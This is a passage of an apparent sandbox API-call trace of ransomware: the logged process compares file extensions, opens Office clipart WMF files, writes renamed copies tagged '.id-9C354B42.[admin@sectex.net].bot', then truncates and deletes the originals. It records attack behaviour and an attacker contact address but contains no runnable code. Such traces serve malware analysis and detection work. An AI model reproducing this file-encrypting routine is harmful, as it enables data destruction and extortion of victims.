	[0146.493] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString=".xls") returned 4
	[0146.493] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.493] lstrlenW (lpString=".xlsx") returned 5
	[0146.493] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.493] lstrlenW (lpString=".ppt") returned 4
	[0146.493] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.494] lstrlenW (lpString=".zip") returned 4
	[0146.494] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.494] lstrlenW (lpString=".rar") returned 4
	[0146.494] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.494] lstrlenW (lpString=".bz2") returned 4
	[0146.494] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.494] lstrlenW (lpString=".7z") returned 3
	[0146.494] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.494] lstrlenW (lpString=".dbf") returned 4
	[0146.494] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.494] lstrlenW (lpString=".1cd") returned 4
	[0146.494] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.494] lstrlenW (lpString=".jpg") returned 4
	[0146.494] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.494] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.494] lstrlenW (lpString="FD00419_.WMF") returned 12
	[0146.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.495] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=16396) returned 1
	[0146.495] CloseHandle (hObject=0x3a0) returned 1
	[0146.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf")) returned 0x20
	[0146.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.495] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.495] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.496] GetLastError () returned 0x0
	[0146.496] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x400c, lpOverlapped=0x0) returned 1
	[0146.498] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4010, lpOverlapped=0x0) returned 1
	[0146.499] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.499] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.499] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.499] CloseHandle (hObject=0x3ac) returned 1
	[0146.499] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.499] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.502] CloseHandle (hObject=0x3a0) returned 1
	[0146.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf")) returned 1
	[0146.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.503] lstrlenW (lpString=".doc") returned 4
	[0146.503] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString=".docx") returned 5
	[0146.503] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.503] lstrlenW (lpString=".pdf") returned 4
	[0146.503] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString=".xls") returned 4
	[0146.503] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.503] lstrlenW (lpString=".xlsx") returned 5
	[0146.503] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.503] lstrlenW (lpString=".ppt") returned 4
	[0146.503] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.503] lstrlenW (lpString=".zip") returned 4
	[0146.503] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.503] lstrlenW (lpString=".rar") returned 4
	[0146.503] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString=".bz2") returned 4
	[0146.503] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString=".7z") returned 3
	[0146.503] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.503] lstrlenW (lpString=".dbf") returned 4
	[0146.503] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.503] lstrlenW (lpString=".1cd") returned 4
	[0146.503] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.503] lstrlenW (lpString=".jpg") returned 4
	[0146.503] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.504] lstrlenW (lpString=".doc") returned 4
	[0146.504] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString=".docx") returned 5
	[0146.504] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.504] lstrlenW (lpString=".pdf") returned 4
	[0146.504] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString=".xls") returned 4
	[0146.504] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.504] lstrlenW (lpString=".xlsx") returned 5
	[0146.504] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.504] lstrlenW (lpString=".ppt") returned 4
	[0146.504] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.504] lstrlenW (lpString=".zip") returned 4
	[0146.504] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.504] lstrlenW (lpString=".rar") returned 4
	[0146.504] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString=".bz2") returned 4
	[0146.504] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString=".7z") returned 3
	[0146.504] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.504] lstrlenW (lpString=".dbf") returned 4
	[0146.504] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.504] lstrlenW (lpString=".1cd") returned 4
	[0146.504] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63
	[0146.504] lstrlenW (lpString=".jpg") returned 4
	[0146.504] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.505] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.505] lstrlenW (lpString="FD00428_.WMF") returned 12
	[0146.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.505] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4796) returned 1
	[0146.505] CloseHandle (hObject=0x3a0) returned 1
	[0146.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf")) returned 0x20
	[0146.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.506] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.506] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.506] GetLastError () returned 0x0
	[0146.506] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x12bc, lpOverlapped=0x0) returned 1
	[0146.508] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x12c0, lpOverlapped=0x0) returned 1
	[0146.509] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.509] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.509] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.509] CloseHandle (hObject=0x3ac) returned 1
	[0146.509] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.509] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.512] CloseHandle (hObject=0x3a0) returned 1
	[0146.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.512] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf")) returned 1
	[0146.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.513] lstrlenW (lpString=".doc") returned 4
	[0146.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString=".docx") returned 5
	[0146.513] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.513] lstrlenW (lpString=".pdf") returned 4
	[0146.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString=".xls") returned 4
	[0146.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.513] lstrlenW (lpString=".xlsx") returned 5
	[0146.513] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.513] lstrlenW (lpString=".ppt") returned 4
	[0146.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.513] lstrlenW (lpString=".zip") returned 4
	[0146.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.513] lstrlenW (lpString=".rar") returned 4
	[0146.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString=".bz2") returned 4
	[0146.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString=".7z") returned 3
	[0146.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.513] lstrlenW (lpString=".dbf") returned 4
	[0146.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.513] lstrlenW (lpString=".1cd") returned 4
	[0146.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.513] lstrlenW (lpString=".jpg") returned 4
	[0146.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.514] lstrlenW (lpString=".doc") returned 4
	[0146.514] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString=".docx") returned 5
	[0146.514] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.514] lstrlenW (lpString=".pdf") returned 4
	[0146.514] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString=".xls") returned 4
	[0146.514] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.514] lstrlenW (lpString=".xlsx") returned 5
	[0146.514] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.514] lstrlenW (lpString=".ppt") returned 4
	[0146.514] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.514] lstrlenW (lpString=".zip") returned 4
	[0146.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.514] lstrlenW (lpString=".rar") returned 4
	[0146.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString=".bz2") returned 4
	[0146.514] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString=".7z") returned 3
	[0146.514] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.514] lstrlenW (lpString=".dbf") returned 4
	[0146.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.514] lstrlenW (lpString=".1cd") returned 4
	[0146.514] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63
	[0146.514] lstrlenW (lpString=".jpg") returned 4
	[0146.515] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.515] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.515] lstrlenW (lpString="FD00435_.WMF") returned 12
	[0146.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.516] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2108) returned 1
	[0146.516] CloseHandle (hObject=0x3ac) returned 1
	[0146.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf")) returned 0x20
	[0146.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.517] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.517] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0146.517] GetLastError () returned 0x0
	[0146.517] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x83c, lpOverlapped=0x0) returned 1
	[0146.691] WriteFile (in: hFile=0x31c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x840, lpOverlapped=0x0) returned 1
	[0146.694] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.694] WriteFile (in: hFile=0x31c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.694] SetEndOfFile (hFile=0x31c) returned 1
	[0146.695] CloseHandle (hObject=0x31c) returned 1
	[0146.695] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.695] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.697] CloseHandle (hObject=0x3ac) returned 1
	[0146.697] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.697] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf")) returned 1
	[0146.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.698] lstrlenW (lpString=".doc") returned 4
	[0146.698] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString=".docx") returned 5
	[0146.698] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.698] lstrlenW (lpString=".pdf") returned 4
	[0146.698] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString=".xls") returned 4
	[0146.698] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.698] lstrlenW (lpString=".xlsx") returned 5
	[0146.698] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.698] lstrlenW (lpString=".ppt") returned 4
	[0146.698] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.698] lstrlenW (lpString=".zip") returned 4
	[0146.698] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.698] lstrlenW (lpString=".rar") returned 4
	[0146.698] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString=".bz2") returned 4
	[0146.698] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString=".7z") returned 3
	[0146.698] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.698] lstrlenW (lpString=".dbf") returned 4
	[0146.698] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.698] lstrlenW (lpString=".1cd") returned 4
	[0146.698] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.698] lstrlenW (lpString=".jpg") returned 4
	[0146.698] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.699] lstrlenW (lpString=".doc") returned 4
	[0146.699] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString=".docx") returned 5
	[0146.699] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.699] lstrlenW (lpString=".pdf") returned 4
	[0146.699] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString=".xls") returned 4
	[0146.699] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.699] lstrlenW (lpString=".xlsx") returned 5
